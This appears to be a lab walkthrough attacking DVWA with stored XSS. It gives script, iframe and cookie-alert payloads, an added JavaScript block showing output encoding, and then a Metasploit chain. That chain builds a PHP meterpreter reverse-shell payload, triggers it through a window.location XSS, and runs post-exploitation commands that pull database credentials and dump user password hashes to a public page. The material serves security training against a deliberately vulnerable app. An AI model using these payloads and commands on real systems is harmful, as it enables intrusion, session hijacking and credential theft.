
1. XSS Stored Basic Exploit Test

55.png
Name: Test 1
Message: <script>alert("This is a XSS Test")</script>

View Test 1 Results
56.png
Note: Every time a user visits this forum, this XSS exploit will be displayed.
Note: This exploit can easily be modified to capture cookie/session information for future man-in-the-middle attacks.

Reset DB
57.png

2. XSS Stored IFRAME Exploit Test
58.png
Name: Test 2
Message: <iframe src="http://www.cnn.com"></iframe>

View Test 2 Results
59.png
Note: This is a powerful exploit because a user could use SET to create a malicious cloned website and place it here.

Reset DB
57.png

3. XSS Stored COOKIE Exploit Test
60.png
Name: Test 3
Message: <script>alert(document.cookie)</script>

View Cookie
61.png
Note: An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
Note: Having received the cookie remotely, the attacker can carry out a MITM attack: connect to the site while impersonating the victim and access that victim's information.

Reset DB
57.png
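
Added example (not from the original post and not DVWA's own code): the three messages from Tests 1-3 rendered through a template that concatenates stored text as-is and through one that HTML-encodes every stored field at output time. The function names and the `entries` array are hypothetical, and the sample rows are constructed from the messages above.

```javascript
// Added example: output-encode stored guestbook fields before rendering.
// escapeHtml, renderVulnerable, renderEncoded, hasInjectedMarkup, audit and
// entries are hypothetical names, not part of DVWA.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: stored text is concatenated into the markup unchanged.
function renderVulnerable(entry) {
  return `<div class="entry">Name: ${entry.name}<br>Message: ${entry.message}</div>`;
}

// Hardened pattern: every stored field is encoded when the page is built.
function renderEncoded(entry) {
  return `<div class="entry">Name: ${escapeHtml(entry.name)}<br>Message: ${escapeHtml(entry.message)}</div>`;
}

// True when the fragment still contains a live <script> or <iframe> start tag,
// which the template itself never emits.
function hasInjectedMarkup(html) {
  return /<\s*(script|iframe)\b/i.test(html);
}

// Constructed sample rows: the messages entered in Tests 1-3.
const entries = [
  { name: "Test 1", message: '<script>alert("This is a XSS Test")</script>' },
  { name: "Test 2", message: '<iframe src="http://www.cnn.com"></iframe>' },
  { name: "Test 3", message: "<script>alert(document.cookie)</script>" },
];

// Render each row both ways and report whether active markup survives.
function audit(rows) {
  return rows.map((e) => ({
    name: e.name,
    vulnerable: hasInjectedMarkup(renderVulnerable(e)),
    encoded: hasInjectedMarkup(renderEncoded(e)),
  }));
}

console.log(audit(entries));
```

Encoding fixes the rendering side for all three tests. Marking the session cookie HttpOnly additionally keeps `document.cookie` from exposing it in Test 3.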

7. XSS Stored window.location Exploit Test

1) Build PHP msfpayload from kali
mkdir -p /root/backdoor
cd /root/backdoor
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.122.148 LPORT=4444 R > FORUM_BUG.php
ls -l FORUM_BUG.php
vi FORUM_BUG.php <-------------- remove the comment marker from <?php

2) Upload PHP Payload
62.png

3) Start PHP Payload Listener from kali
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.122.148
set LPORT 4444
exploit

4) XSS Stored window.location Exploit
: Enter JS that loads the FORUM_BUG.php saved above

63.png
Name: Test 4
Message: <script>window.location="http://192.168.122.179/dvwa/hackable/uploads/FORUM_BUG.php" </script>

5) access from victim

6) View Metasploit Session
from Meterpreter:
shell
tail /etc/passwd
whoami
grep apache /etc/passwd
find /var/www/* -print | grep config
grep "db_" /var/www/html/dvwa/config/config.inc.php
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- The <pre> is used as a pre-formatter
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- Accessing this page now shows the information pulled from the DB above
